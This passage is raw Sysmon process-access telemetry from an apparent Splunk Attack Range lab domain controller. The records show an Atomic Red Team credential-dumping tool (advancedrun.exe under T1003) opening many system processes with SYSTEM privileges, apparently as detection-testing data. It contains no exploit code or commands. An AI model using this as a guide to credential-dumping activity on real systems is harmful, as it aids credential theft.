Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967488Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003967487Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967486Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967485Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967484Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967483Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967482Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967481Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967480Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967479Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967478Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967477Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967476Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967475Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967474Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967473Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.332{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967472Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 